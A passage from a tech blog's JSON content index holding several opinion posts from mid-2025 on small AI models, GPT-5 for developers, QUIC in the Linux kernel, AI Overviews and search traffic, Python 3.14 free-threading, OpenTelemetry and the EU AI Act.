one.\nI\u0026rsquo;ve been experimenting with small models for edge deployment in IoT contexts for a while now, and the capabilities keep getting more impressive with each generation. If your reaction to Gemma 3 270M is \u0026ldquo;that\u0026rsquo;s too small to be useful,\u0026rdquo; I\u0026rsquo;d encourage you to actually try it on your specific use case. You might be surprised.\nThe future of AI in production isn\u0026rsquo;t just about the headline-grabbing mega-models. It\u0026rsquo;s about having the right model at the right size in the right place. And right now, tiny models that run anywhere are solving real problems that big models can\u0026rsquo;t touch.\n","date":"14 August 2025","externalUrl":null,"permalink":"/posts/250814-gemma3-270m-small-models-big-impact/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Google releases Gemma 3 at 270M parameters, proving that smaller, more efficient models might matter more than the next big model launch.","title":"Google's Gemma 3 270M — Why Tiny Models Are the Real AI Story","type":"posts"},{"content":" Overview # While proprietary AI models dominate headlines, an open-source AI movement is rapidly maturing. This series covers open-weight models (Llama, Mistral, Qwen), community-driven fine-tuning, the licensing challenges unique to AI (what does \u0026ldquo;open source\u0026rdquo; mean for models?), and how open development is reshaping the AI landscape.\nOpen models enable self-hosting, fine-tuning for specific domains, and reduced dependence on proprietary APIs.\nWhat You\u0026rsquo;ll Find Here # Open-Weight Models: Tracking important open-weight releases, comparing their capabilities to proprietary alternatives, and understanding licensing implications.\nCommunity Fine-Tuning: How open models enable organizations to adapt them for specific use cases, custom adapters, and transfer learning approaches.\nLicensing Debates: Understanding what open source means for AI—license implications, commercial use restrictions, and emerging frameworks.\nSelf-Hosting: Tools and infrastructure for running models locally—quantization, inference optimization, and deployment patterns.\nEvaluation \u0026amp; Benchmarking: How to fairly compare open models, run benchmarks locally, and understand when open alternatives are sufficient.\nEcosystem Development: Tools, frameworks, and communities building around open AI—from Hugging Face to specialized inference engines.\nLearning Path # Understand the open AI landscape — major open-weight models and their characteristics Evaluate commercial viability — understand licensing, cost, and practical trade-offs with proprietary services Learn fine-tuning techniques — LoRA, QLoRA, and other adaptation methods that enable customization Explore deployment options — self-hosting, managed open services, and infrastructure requirements Build with open models — practical patterns for leveraging open models in production systems Key Areas Covered # Open-Weight Models: Llama, Mistral, Qwen, Phi, and other foundation models Fine-Tuning Methods: LoRA, QLoRA, prefix tuning, and efficient adaptation Licensing: Open Rail, Llama community license, commercial restrictions, and compliance Infrastructure: vLLM, Ollama, LM Studio, TGI, and inference optimization Evaluation: Custom benchmarks, domain-specific evaluation, and local testing approaches Frameworks: Hugging Face Transformers, LangChain, LlamaIndex, and integration tools Quantization: GGUF, GPTQ, AWQ, and reducing model size for local deployment Related Series # Explore complementary areas: AI Models \u0026amp; Releases (proprietary models and their development), Python Evolution (Python frameworks for working with AI models)\n","date":"14 August 2025","externalUrl":null,"permalink":"/series/open-source-ai/","section":"Blog Series: In-Depth Tech Coverage on AI, Security \u0026 Cloud","summary":"","title":"Open Source AI","type":"series"},{"content":"","date":"7 August 2025","externalUrl":null,"permalink":"/tags/gpt/","section":"Blog Tags: Software Development, AI, Security \u0026 Infrastructure","summary":"","title":"GPT","type":"tags"},{"content":"OpenAI released GPT-5 today, and the Hacker News thread has already blown past 2,000 comments. After spending a few hours with the model and reading through Simon Willison\u0026rsquo;s excellent breakdown of the system card and pricing, I have some initial thoughts on what this means for those of us who actually build things with these models.\nLet me be upfront: I\u0026rsquo;m going to focus on what\u0026rsquo;s practically different for developers rather than getting caught up in benchmark numbers. We\u0026rsquo;ve all seen enough cherry-picked demos to know that the real test is sustained, production-level performance on the messy, ambiguous tasks that make up actual software development. This mirrors how reasoning models and extended thinking are transforming complex problem-solving, with real-world benefits that go beyond marketing claims.\nWhat\u0026rsquo;s Genuinely New # GPT-5 represents a meaningful step forward in several areas that matter for production use:\nContext handling has improved substantially. The model is better at maintaining coherence across long conversations and large codebases. If you\u0026rsquo;ve been frustrated by GPT-4\u0026rsquo;s tendency to \u0026ldquo;forget\u0026rdquo; earlier context in long sessions, GPT-5 handles this noticeably better. For code review and refactoring tasks that require understanding an entire module or service, this is a real improvement.\nInstruction following is tighter. The gap between what you ask for and what you get has narrowed. This might sound minor, but if you\u0026rsquo;re building automated pipelines that depend on consistent LLM output formatting, fewer parsing failures and edge cases translate directly into more reliable systems.\nReasoning about code shows improvement on complex, multi-step problems. I threw some of my standard test cases at it — debugging race conditions, explaining complex type system interactions, analyzing security implications of design choices — and the results were consistently better than GPT-4, particularly on problems that require holding multiple concerns in mind simultaneously.\nThe Pricing Question # The pricing structure deserves attention because it affects architectural decisions. Based on the initial numbers, GPT-5 is more expensive per token than GPT-4, which was already not cheap for high-volume applications. This reinforces a pattern I\u0026rsquo;ve been advocating for: use the right model for the right task.\nFor many production applications, the smart move isn\u0026rsquo;t to upgrade everything to GPT-5. It\u0026rsquo;s to use GPT-5 for the tasks where it genuinely outperforms cheaper models — complex reasoning, nuanced code generation, difficult debugging — and keep using smaller, faster, cheaper models for classification, simple extraction, and routine tasks. This aligns with broader cloud cost optimization and infrastructure efficiency concerns.\nIf you\u0026rsquo;re not already implementing model routing in your AI-powered applications, now\u0026rsquo;s the time. A simple dispatcher that sends easy queries to a small model and complex queries to GPT-5 can cut your API costs dramatically while actually improving latency for the majority of requests.\nThe Developer Experience Angle # OpenAI also published a GPT-5 for Developers guide, which signals they\u0026rsquo;re taking the developer experience seriously. The API improvements include better streaming support, more granular control over response formatting, and improved function calling reliability.\nThe function calling improvements are particularly interesting for anyone building agents or tool-using systems. GPT-4\u0026rsquo;s function calling was good but had a frustrating failure mode where it would sometimes call functions with subtly wrong parameter types or make unnecessary calls. Early testing suggests GPT-5 is more disciplined here.\nFor those of us building development tools that integrate LLMs, the improved consistency means less defensive coding around LLM outputs. You still need error handling — these are probabilistic systems — but the error rate seems genuinely lower.\nWhat Hasn\u0026rsquo;t Changed # Let me be the pragmatist in the room: GPT-5 doesn\u0026rsquo;t solve the fundamental limitations of LLMs for software development.\nIt still hallucinates. Less frequently, perhaps, but it still confidently generates code that references APIs that don\u0026rsquo;t exist or uses library features from the wrong version. You still need tests, code review, and verification for anything it produces.\nIt still struggles with novel architectures. If you\u0026rsquo;re working with a framework or pattern that isn\u0026rsquo;t well-represented in the training data, GPT-5 will still give you plausible-looking but incorrect solutions. The model is better, not magical.\nIt doesn\u0026rsquo;t replace understanding. I\u0026rsquo;ve seen a growing trend of developers treating LLMs as oracles rather than tools, accepting generated code without understanding it. GPT-5 being better at generating correct code might actually make this worse, because the failure modes become subtler and harder to catch. AI-assisted testing frameworks are essential for maintaining code quality when relying on generated code, and security-focused practices ensure generated code doesn\u0026rsquo;t introduce vulnerabilities.\nThe Open Source Response # Every major OpenAI release accelerates the open-source AI community. I expect we\u0026rsquo;ll see a flurry of activity in the coming weeks as researchers analyze GPT-5\u0026rsquo;s capabilities and work to replicate them in open models. The gap between closed and open models has been narrowing steadily, and GPT-5 will set new targets for projects like Llama, Mistral, and others to aim for.\nFor teams that need to run models on-premises — whether for data privacy, latency, or cost reasons — the open-source trajectory remains encouraging even as GPT-5 raises the bar.\nMy Take # GPT-5 is a genuine improvement, not just an incremental version bump with better marketing. The improvements in context handling and instruction following address real pain points that I\u0026rsquo;ve hit repeatedly in production systems.\nBut I want to push back on the narrative that each new model release fundamentally changes what\u0026rsquo;s possible. The jump from GPT-3.5 to GPT-4 was transformative — it crossed a threshold where LLMs became genuinely useful for professional software development. GPT-5 makes that experience better and more reliable, but it\u0026rsquo;s an evolution, not a revolution.\nThe most important thing you can do today isn\u0026rsquo;t rush to upgrade everything to GPT-5. It\u0026rsquo;s to think carefully about where LLMs add value in your workflow, build robust evaluation frameworks, and make sure you can swap models easily as the landscape continues to evolve. The model you should use six months from now might not be from OpenAI at all.\nThat said, if you haven\u0026rsquo;t already, go try it. Form your own opinions. The best way to understand what a new model can do is to throw your hardest problems at it and see what comes back.\n","date":"7 August 2025","externalUrl":null,"permalink":"/posts/250807-gpt5-launch-developer-implications/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"OpenAI launches GPT-5 with significant improvements. Here’s what matters for developers beyond the marketing.","title":"GPT-5 Is Here — A Developer's First Look at What Actually Changed","type":"posts"},{"content":"","date":"7 August 2025","externalUrl":null,"permalink":"/tags/openai/","section":"Blog Tags: Software Development, AI, Security \u0026 Infrastructure","summary":"","title":"OpenAI","type":"tags"},{"content":"There\u0026rsquo;s been a lot of talk about QUIC over the past few years, but this week the conversation shifted from \u0026ldquo;QUIC is interesting\u0026rdquo; to \u0026ldquo;QUIC is becoming infrastructure.\u0026rdquo; A detailed write-up on LWN.net covered the ongoing effort to bring QUIC support directly into the Linux kernel, and the implications for anyone running server infrastructure are substantial.\nFor those who haven\u0026rsquo;t been tracking this: QUIC is the transport protocol that underpins HTTP/3. Originally developed by Google, it\u0026rsquo;s been an IETF standard since 2021. Until now, QUIC has lived entirely in userspace — libraries like quiche, ngtcp2, and the various language-specific implementations handle the protocol. This mirrors the broader infrastructure consolidation happening across cloud platforms. Moving it into the kernel is a fundamentally different proposition.\nWhy Kernel-Level QUIC Matters # The obvious question is: if userspace QUIC works fine, why bother with a kernel implementation? The answer comes down to performance, integration, and the long game.\nPerformance: Userspace QUIC implementations involve copying data between kernel and userspace buffers, context switches for every packet, and duplicated functionality that the kernel\u0026rsquo;s networking stack already handles efficiently. For high-throughput servers handling thousands of concurrent connections, this overhead adds up. Kernel QUIC can leverage zero-copy techniques, integrate with the existing socket API, and benefit from the kernel\u0026rsquo;s packet scheduling infrastructure.\nSocket API compatibility: Right now, applications that want to use QUIC need to integrate with a specific QUIC library. A kernel implementation exposes QUIC through the familiar socket API, meaning existing applications could potentially switch transport protocols with minimal code changes. Think about what happened when TLS got kTLS kernel support — it enabled transparent TLS offloading for applications that didn\u0026rsquo;t need to know about the details.\nHardware offloading: Network interface cards are increasingly capable of offloading protocol processing. TCP offloading is mature; QUIC offloading is coming. But hardware offload works best when the protocol is in the kernel where the NIC driver lives. Kernel QUIC opens the door for QUIC-aware NICs to handle encryption and packet processing in hardware.\nThe Implementation Challenges # Bringing QUIC into the kernel isn\u0026rsquo;t straightforward, and the LWN discussion highlighted several interesting challenges.\nQUIC is fundamentally different from TCP in ways that make kernel integration tricky. Each QUIC connection uses its own encryption context, meaning the kernel needs to manage potentially millions of independent TLS contexts. TCP\u0026rsquo;s kernel TLS implementation handles a simpler case because TCP connections share more infrastructure.\nConnection migration — one of QUIC\u0026rsquo;s headline features, allowing connections to survive IP address changes — requires the kernel to maintain connection state that\u0026rsquo;s indexed differently from traditional socket lookups. The kernel\u0026rsquo;s networking stack is heavily optimized around the four-tuple (source IP, source port, destination IP, destination port), but QUIC uses connection IDs that are independent of network addresses.\nThere\u0026rsquo;s also the question of how much of QUIC belongs in the kernel versus userspace. The current proposals take a hybrid approach: the kernel handles the transport layer (packet I/O, congestion control, encryption for data packets) while handshake and connection management remain in userspace. This is pragmatic — it gets the performance benefits without trying to shove the entire QUIC state machine into kernel space.\nWhat This Means for DevOps # If you\u0026rsquo;re running infrastructure today, here\u0026rsquo;s what to watch for:\nnginx, HAProxy, and friends will eventually gain kernel QUIC support, likely showing meaningful performance improvements for HTTP/3 workloads. If you\u0026rsquo;re already serving HTTP/3, the transition should be mostly transparent — better performance without configuration changes.\nLoad balancers get interesting because QUIC\u0026rsquo;s connection migration feature means traditional layer-4 load balancing approaches need rethinking. A connection that starts on one server IP might migrate to another, and the load balancer needs to handle this gracefully. Kernel-level awareness helps here.\nMonitoring and observability will need updates. Tools that do packet inspection at the kernel level (eBPF-based tools, tc filters, etc.) will need to understand QUIC\u0026rsquo;s encrypted transport. Unlike TCP, you can\u0026rsquo;t just peek at headers — QUIC encrypts almost everything.\nContainer networking implementations (Cilium, Calico, etc.) will need to account for QUIC kernel support in their networking policies. eBPF programs that currently handle TCP and UDP will need QUIC-aware paths.\nThe Bigger Picture # What I find most interesting about this development is what it says about protocol evolution. HTTP moved from TCP to QUIC in userspace first, proving the protocol worked at scale. Now it\u0026rsquo;s moving into the kernel for performance. This pattern — prototype in userspace, prove at scale, then optimize in the kernel — is becoming the standard approach for networking innovation.\nCompare this to how TCP evolved: everything happened in the kernel, making experimentation slow and risky. The QUIC approach is healthier. We got years of production experience from Google, Cloudflare, and others running userspace QUIC before anyone had to commit to a kernel implementation. This pattern of infrastructure maturation and optimization is becoming more common across technology stacks.\nMy Take # I\u0026rsquo;ve been managing Linux servers since the 2.4 kernel days, and watching the networking stack evolve has been one of the more fascinating threads in systems engineering. Kernel QUIC feels like the next major inflection point after kTLS.\nThe practical impact won\u0026rsquo;t be immediate — we\u0026rsquo;re probably looking at a year or more before kernel QUIC is stable and widely deployed. But if you\u0026rsquo;re designing infrastructure that needs to last, building with HTTP/3 and QUIC in mind is no longer forward-thinking — it\u0026rsquo;s just good engineering.\nThe performance improvements alone should get your attention. But the real win is that kernel QUIC makes the protocol a first-class citizen of the Linux networking stack, which means the entire ecosystem of tools, monitoring, and optimization that\u0026rsquo;s been built around kernel networking will eventually work with QUIC too. This is exactly the kind of observability and tooling maturation that platform teams rely on.\nStart testing HTTP/3 in your staging environments if you haven\u0026rsquo;t already. When kernel QUIC lands in your distribution\u0026rsquo;s default kernel, you\u0026rsquo;ll want to be ready to take advantage of it.\n","date":"31 July 2025","externalUrl":null,"permalink":"/posts/250731-quic-protocol-linux-kernel/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"The push to bring QUIC protocol support into the Linux kernel marks a significant shift in how we think about transport-layer networking.","title":"QUIC Comes to the Linux Kernel — What It Means for Infrastructure","type":"posts"},{"content":"The data is in, and it\u0026rsquo;s not pretty. According to a comprehensive analysis covered by Ars Technica, Google\u0026rsquo;s AI Overviews feature is causing a dramatic decline in organic search clicks. We\u0026rsquo;re talking double-digit percentage drops for many query categories. If you build anything that depends on search traffic — and let\u0026rsquo;s be honest, who doesn\u0026rsquo;t — this should have your full attention.\nI\u0026rsquo;ve been watching this unfold since AI Overviews rolled out more broadly, and while the writing was on the wall, the scale of the impact is still striking. Google has effectively inserted itself as the answer layer between users and websites, and the consequences are rippling through the entire web ecosystem. This mirrors the broader regulatory and structural tensions emerging around how AI systems interact with human-created content.\nWhat the Numbers Actually Show # The core finding is straightforward: when Google provides an AI-generated summary at the top of search results, users click through to actual websites far less frequently. This isn\u0026rsquo;t surprising in isolation — if you get your answer without clicking, why would you click? But the aggregate effect across billions of searches is reshaping traffic patterns in ways that affect everyone from solo bloggers to major publications.\nInformational queries are hit hardest. The kind of \u0026ldquo;how does X work\u0026rdquo; or \u0026ldquo;what is Y\u0026rdquo; searches that used to drive traffic to documentation sites, tutorials, and knowledge bases are now being answered directly in the search results page. For developers, this means Stack Overflow, MDN, and countless tutorial sites are seeing diminished referral traffic.\nThe irony isn\u0026rsquo;t lost on me: Google trained its AI on content from these very sites, and now that AI is reducing the traffic those sites receive. It\u0026rsquo;s a feedback loop that could eventually degrade the quality of the training data itself.\nThe Developer Impact # As someone who\u0026rsquo;s maintained technical documentation and blogs for decades, this shift hits close to home. But let me be specific about what this means for our world:\nDocumentation sites that rely on search traffic to justify their existence (and funding) are going to face harder conversations about sustainability. If Google answers \u0026ldquo;how to configure nginx reverse proxy\u0026rdquo; with an AI summary, fewer people visit the actual nginx docs or the carefully written blog post that explained the nuances.\nAPI documentation is somewhat insulated — you still need to visit the actual docs to get current endpoint details — but conceptual and tutorial content is squarely in the firing line.\nDeveloper tool marketing that depends on organic search is getting squeezed. If you\u0026rsquo;re a small startup trying to get discovered through \u0026ldquo;best testing framework for React\u0026rdquo; type searches, AI Overviews might be giving a summary that never mentions you, or worse, summarizes your competitor\u0026rsquo;s content without linking to either.\nThe Broader Web Ecosystem Question # This development connects to a larger question I\u0026rsquo;ve been turning over: what happens to the open web when the primary discovery mechanism starts consuming content rather than directing users to it?\nWe\u0026rsquo;ve already seen this pattern with social media platforms — Facebook\u0026rsquo;s pivot to keeping users on-platform rather than clicking out to articles devastated many publishers years ago. Google doing the same thing with search is arguably more consequential because search has been the backbone of web content discovery for two decades.\nSimilar policy frameworks like the EU AI Act also struggle to address how AI-powered platforms reshape content economics. The policy community isn\u0026rsquo;t keeping pace with the technology. We\u0026rsquo;re getting policy frameworks for AI safety and development, but the economic restructuring that AI-powered search causes for web publishers is largely being ignored.\nWhat Can We Actually Do? # I don\u0026rsquo;t think the answer is to fight the technology — that\u0026rsquo;s a losing battle. But there are practical responses:\nStructured data becomes more important than ever. If AI is going to summarize your content, making sure it can accurately represent your information (and attribute it) requires clean, well-structured markup.\nBuild direct audiences. Email newsletters, RSS feeds, community forums — anything that creates a direct relationship with your readers rather than depending on Google as an intermediary. This lesson echoes what we\u0026rsquo;re learning from platform consolidation in development tooling. I know this sounds like advice from 2015, but it\u0026rsquo;s never been more relevant.\nCreate content that can\u0026rsquo;t be easily summarized. Interactive tools, detailed tutorials with working code examples, opinionated analysis — content that requires context and engagement rather than a simple factual answer.\nConsider the API-first approach. If your content or tool is genuinely useful, making it accessible programmatically might be more sustainable than depending on web traffic.\nMy Take # I\u0026rsquo;ve been in tech long enough to have seen several platform shifts that reshuffled winners and losers. This one feels particularly significant because search has been the one constant — the reliable way that content found its audience. Watching that relationship get intermediated by AI summaries is uncomfortable, but it\u0026rsquo;s also forcing a useful reckoning.\nThe web has been too dependent on a single company\u0026rsquo;s algorithm for too long. Maybe this is the push that finally diversifies how we discover and share technical knowledge. Or maybe it just consolidates Google\u0026rsquo;s position further. Right now, I\u0026rsquo;d bet on the latter, but I\u0026rsquo;m hoping to be wrong.\nWhat I do know is that if you\u0026rsquo;re building anything on the web today, factoring in a world where search traffic is significantly reduced isn\u0026rsquo;t pessimism — it\u0026rsquo;s planning.\n","date":"24 July 2025","externalUrl":null,"permalink":"/posts/250724-ai-overviews-search-traffic-decline/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Google’s AI Overviews are causing a massive drop in organic search clicks, reshaping how the web works for publishers and developers alike.","title":"AI Overviews Are Crushing Search Traffic — And We Should Have Seen It Coming","type":"posts"},{"content":"Python 3.14 beta is here, and while the version number alone invites pi jokes, the real story is the continued progress on one of the most ambitious changes in Python\u0026rsquo;s history: the experimental free-threaded build that removes the Global Interpreter Lock (GIL). After decades of the GIL defining Python\u0026rsquo;s concurrency story, we\u0026rsquo;re getting our first real taste of what Python looks like without it.\nThe GIL, For Those Who Haven\u0026rsquo;t Suffered # If you\u0026rsquo;ve ever tried to speed up a CPU-bound Python program by throwing threads at it, you\u0026rsquo;ve met the GIL. The Global Interpreter Lock is a mutex that protects access to Python objects, ensuring that only one thread executes Python bytecode at a time. It simplifies the implementation of CPython and makes C extensions safer to write, but it means that multithreaded Python programs can\u0026rsquo;t truly utilize multiple CPU cores for CPU-bound work.\nThis has been Python\u0026rsquo;s most notorious limitation. We\u0026rsquo;ve worked around it for years — multiprocessing, asyncio, Cython, offloading to C extensions — but these are all workarounds, not solutions. PEP 703, which proposed making the GIL optional, was accepted in 2023, and the implementation has been progressing through CPython development since then.\nWhat\u0026rsquo;s in the 3.14 Beta # The free-threaded build (enabled with --disable-gil at compile time, or available as a separate installer) has made significant progress since the initial experimental support in Python 3.13. Key improvements in the 3.14 beta include:\nBetter performance for single-threaded code: One of the major concerns with removing the GIL was that single-threaded performance would regress. The 3.14 beta narrows this gap significantly. While the free-threaded build is still slightly slower than the default GIL-enabled build for single-threaded workloads, the difference is now in the low single-digit percentages for most benchmarks, down from the 5-10% regression seen in earlier builds.\nImproved C extension compatibility: The Py_GIL_DISABLED build flag and related C API changes are better documented and more stable. Several major packages — NumPy, Cython, and others — have been working on free-threaded compatible builds, and the ecosystem support is growing.\nNew synchronization primitives: The threading module gains new primitives designed for the free-threaded world, including more efficient locks and better support for lock-free data structures. The concurrent.futures module also sees improvements that take advantage of true thread parallelism.\nPer-object locking: Instead of one big lock for everything, the free-threaded interpreter uses fine-grained, per-object locks. This is what enables true parallelism while still protecting against data races on individual objects.\nReal-World Implications # Let me paint a picture of what this means in practice. Consider a web application running under a WSGI server. Today, if you want to handle concurrent requests in a single process, you use threads — but the GIL means those threads can\u0026rsquo;t truly execute Python code in parallel. For I/O-bound work (waiting on database queries, HTTP calls), this is fine because the GIL is released during I/O. But any CPU-bound work — template rendering, data serialization, business logic — is serialized.\nWith free-threaded Python, those threads can genuinely run in parallel. A 4-core machine running a single Python process with 4 worker threads could, in principle, handle 4x the CPU-bound throughput of a GIL-constrained process. No more spawning multiple processes with gunicorn --workers 4 and paying the memory overhead of duplicating your application state.\nFor data science and scientific computing, the implications are even more dramatic. Operations that currently require multiprocessing (with its serialization overhead for inter-process communication) could use threads with shared memory instead. Parallel data processing pipelines become simpler to write and more memory-efficient.\nThe Ecosystem Challenge # Here\u0026rsquo;s the part that tempers my excitement: the ecosystem isn\u0026rsquo;t ready yet, and it won\u0026rsquo;t be for a while. The free-threaded build requires C extensions to be explicitly compatible. Any extension that relies on the GIL for thread safety — and many do, often implicitly — needs to be audited and potentially rewritten.\nThe Python Packaging Authority (PyPA) is working on mechanisms to distribute separate wheel builds for GIL-enabled and free-threaded Python, but this means package maintainers need to test against both variants. For the hundreds of thousands of packages on PyPI, this is a massive undertaking.\nIn practice, I expect the adoption path to look something like this:\nNow through 2026: Early adopters experiment with free-threaded builds for new projects with minimal C extension dependencies 2026-2027: Major packages achieve free-threaded compatibility, enabling broader adoption 2027-2028: Free-threaded becomes the default build, with GIL available as a fallback Eventually: The GIL-enabled build is deprecated Writing Thread-Safe Python # One thing that developers need to internalize: without the GIL, Python code that was \u0026ldquo;accidentally thread-safe\u0026rdquo; due to the GIL is no longer safe. Consider a simple counter:\ncounter = 0 def increment(): global counter counter += 1 With the GIL, concurrent calls to increment() are effectively serialized, so this works fine in practice (though it was never guaranteed). Without the GIL, this is a classic data race. You need proper synchronization:\nimport threading counter = 0 lock = threading.Lock() def increment(): global counter with lock: counter += 1 This is basic concurrent programming, but many Python developers have never had to think about it because the GIL provided a safety net. The transition will require a mindset shift across the Python community.\nMy Take # I\u0026rsquo;ve been writing Python since the 2.x days, and the GIL has always been the elephant in the room — the thing that made Python \u0026ldquo;not a real language\u0026rdquo; in the eyes of systems programmers. Seeing it finally become optional is remarkable, and the engineering effort behind PEP 703 is impressive.\nBut I\u0026rsquo;d counsel patience. The free-threaded build is explicitly experimental in 3.14, and for good reason. Don\u0026rsquo;t rush to deploy it in production. Do start experimenting with it in development, especially if you\u0026rsquo;re a library author. Understanding how your code behaves without the GIL now will prepare you for the day when it becomes the default.\nPython\u0026rsquo;s evolution continues to impress me. It\u0026rsquo;s a language that consistently chooses pragmatic, incremental improvement over revolutionary breaking changes, and the GIL removal is following that same playbook. Slowly, carefully, but decisively.\nThe 3.14 beta is worth installing alongside your production Python. The future of Python parallelism is being built right now, and it\u0026rsquo;s exciting to watch it take shape.\n","date":"17 July 2025","externalUrl":null,"permalink":"/posts/250717-python-314-free-threading/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Python 3.14’s beta release showcases the experimental free-threaded mode, promising true parallelism without the GIL — and the implications for the Python ecosystem are enormous.","title":"Python 3.14 Beta and the Free-Threading Revolution","type":"posts"},{"content":"It\u0026rsquo;s been a long road, but OpenTelemetry has effectively reached full maturity. With the logging signal now generally available across the major language SDKs — joining traces and metrics that have been stable for a while — the project has delivered on its original promise: a single, vendor-neutral standard for all three pillars of observability. This maturation mirrors what we\u0026rsquo;ve seen across the platform engineering landscape, where infrastructure consolidation creates value. For those of us who\u0026rsquo;ve spent years navigating the fragmented observability tooling landscape, this is a genuinely significant milestone.\nWhy This Matters # To appreciate why OpenTelemetry\u0026rsquo;s maturity is a big deal, you need to understand the pain it was designed to solve. Before OTel, if you wanted observability in your application, you were essentially locked into a vendor\u0026rsquo;s SDK. Want to use Datadog? Import their libraries. Prefer New Relic? Different libraries. Switching vendors meant re-instrumenting your entire codebase.\nThe OpenTracing and OpenCensus projects tried to solve this with open standards, but having two competing \u0026ldquo;open\u0026rdquo; standards was almost worse than having none. The merger of these projects into OpenTelemetry in 2019 was the right move, but it meant years of development to build a comprehensive, production-ready framework.\nNow, with all three signals — traces, metrics, and logs — at GA status, teams can instrument once and send telemetry data to any compatible backend. Jaeger, Zipkin, Prometheus, Datadog, New Relic, Grafana Cloud, Honeycomb — they all speak OTel. Your instrumentation code is no longer a vendor commitment.\nThe Logging Signal Changes Things # Traces and metrics reaching GA was important, but logging completing the picture changes how we should think about observability architectures. Here\u0026rsquo;s why:\nTraditional logging (think: structured JSON logs sent to Elasticsearch or CloudWatch) and distributed tracing have historically been separate systems with separate instrumentation, separate storage, and separate query interfaces. Correlating a log entry with a trace span required manually propagating trace IDs through your logging framework — doable, but tedious and error-prone.\nWith OpenTelemetry\u0026rsquo;s logging signal, logs are first-class citizens in the same telemetry pipeline as traces and metrics. Log records can be automatically correlated with trace contexts, meaning you can click from a slow trace span directly into the relevant log entries without manual correlation. This is the kind of integrated observability experience that was previously only available within proprietary platforms.\nThe OTel log bridge API is particularly well-designed. Rather than asking you to replace your existing logging framework (nobody wants to rewrite every logger.info() call), it bridges your existing logging library — whether that\u0026rsquo;s SLF4J, Python\u0026rsquo;s logging module, or Winston in Node.js — into the OTel pipeline. You keep your familiar logging patterns while gaining OTel\u0026rsquo;s correlation and export capabilities.\nPractical Adoption Patterns # Having worked on several projects implementing OpenTelemetry over the past year, I\u0026rsquo;ve developed some opinions about what works and what doesn\u0026rsquo;t.\nStart with auto-instrumentation: Every major OTel SDK offers auto-instrumentation that hooks into common frameworks and libraries without code changes. For a typical web application, auto-instrumentation gives you HTTP request traces, database query spans, and outbound HTTP call spans essentially for free. Start here and add manual instrumentation for your business-critical code paths later.\nUse the OTel Collector: Don\u0026rsquo;t send telemetry directly from your application to your backend. Deploy the OTel Collector as an intermediary. It handles batching, retrying, and routing, and it lets you change backends without touching your application configuration. I\u0026rsquo;ve seen teams skip the Collector for simplicity and regret it when they need to add filtering, sampling, or a second backend destination.\nImplement tail-based sampling for traces: Head-based sampling (deciding whether to sample at the start of a trace) is simple but wasteful — you\u0026rsquo;ll miss interesting traces and capture boring ones. Tail-based sampling in the Collector lets you make sampling decisions after seeing the complete trace, keeping error traces and slow traces while dropping routine ones. This can reduce your storage costs by 90% while keeping the data that actually matters.\nDefine semantic conventions early: OpenTelemetry defines semantic conventions for common attributes like http.method, db.system, and rpc.service. Adopt these consistently from the start. Custom attributes are fine for domain-specific data, but inconsistent naming across services will make your observability data much harder to query.\nThe Vendor Landscape Responds # It\u0026rsquo;s been interesting watching observability vendors respond to OTel\u0026rsquo;s maturation. The smart ones — Honeycomb, Grafana Labs, Lightstep (now part of ServiceNow) — embraced OTel early and built their products around it. Others have been slower to adapt, maintaining proprietary agents while adding OTel compatibility as a secondary option.\nThe market dynamic is shifting. When your instrumentation is vendor-neutral, switching costs drop dramatically. Vendors need to compete on analysis capabilities, user experience, and pricing rather than lock-in. This is good for customers and, ultimately, good for the industry.\nMy Take # I\u0026rsquo;ve been following OpenTelemetry since the OpenTracing days, and I\u0026rsquo;ll admit there were moments when I wondered if the project would ever reach this point. The scope was ambitious, the governance was complex, and the pace of development sometimes felt glacial. But the approach of building a comprehensive, vendor-neutral standard — rather than shipping something quick and incomplete — has paid off.\nFor teams that haven\u0026rsquo;t adopted OpenTelemetry yet, now is the time. The \u0026ldquo;it\u0026rsquo;s not mature enough\u0026rdquo; objection is no longer valid. All three signals are GA. The auto-instrumentation libraries cover most common frameworks. The Collector is battle-tested. The ecosystem of compatible backends is broad. This is the kind of foundational infrastructure investment that platform teams should prioritize.\nIf you\u0026rsquo;re still using vendor-specific SDKs for your observability, start planning your migration. Not because your current vendor is bad, but because vendor-neutral instrumentation gives you options. And in infrastructure, having options is always better than the alternative.\nThe observability space has been waiting for a true standard for years. OpenTelemetry has delivered, and it\u0026rsquo;s time to build on that foundation.\n","date":"10 July 2025","externalUrl":null,"permalink":"/posts/250710-opentelemetry-full-maturity/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"With OpenTelemetry’s logging signal reaching GA status, the project now covers all three pillars of observability with stable APIs, fulfilling a long-standing promise to the industry.","title":"OpenTelemetry Reaches Full Maturity — Observability Finally Has a Standard","type":"posts"},{"content":"The EU AI Act\u0026rsquo;s provisions on prohibited AI practices took effect earlier this year, and the next wave of requirements — covering high-risk AI systems — is now firmly on the horizon. If you\u0026rsquo;re a developer building AI-powered applications that serve European users, the compliance clock is ticking, and it\u0026rsquo;s time to think about what this means for your code, your architecture, and your development processes. This builds on regulatory approaches we\u0026rsquo;ve seen before, but with more comprehensive scope. This isn\u0026rsquo;t entirely new territory — the AI Act proposal has been evolving since 2021, giving regulators and industry time to shape the final framework.\nUnderstanding the Risk Categories # The AI Act categorizes AI systems into risk tiers, and this categorization has direct implications for how you build and deploy software. At the top are prohibited practices — things like social scoring systems, real-time biometric surveillance (with narrow exceptions), and manipulative AI techniques. Most developers won\u0026rsquo;t encounter these, but it\u0026rsquo;s worth understanding the boundaries.\nThe category that will affect the most development teams is high-risk AI systems. This includes AI used in employment decisions, credit scoring, education assessment, critical infrastructure management, and law enforcement. If your AI system influences decisions in any of these domains, you\u0026rsquo;re subject to substantial requirements around documentation, testing, human oversight, and transparency.\nWhat catches many teams off guard is how broadly \u0026ldquo;high-risk\u0026rdquo; can be interpreted. A resume screening tool? High-risk. An AI-powered educational tutoring system that affects student assessments? Potentially high-risk. A predictive maintenance system for energy infrastructure? High-risk. The scope is wider than many developers initially assume.\nPractical Technical Requirements # Let me break down what the high-risk requirements mean in practice for a development team:\nTechnical documentation: You need comprehensive documentation of your training data, model architecture, training process, and evaluation metrics. This isn\u0026rsquo;t just a README — the Act expects documentation sufficient for a regulator to understand how your system works and why it makes the decisions it does. If you\u0026rsquo;re using fine-tuned foundation 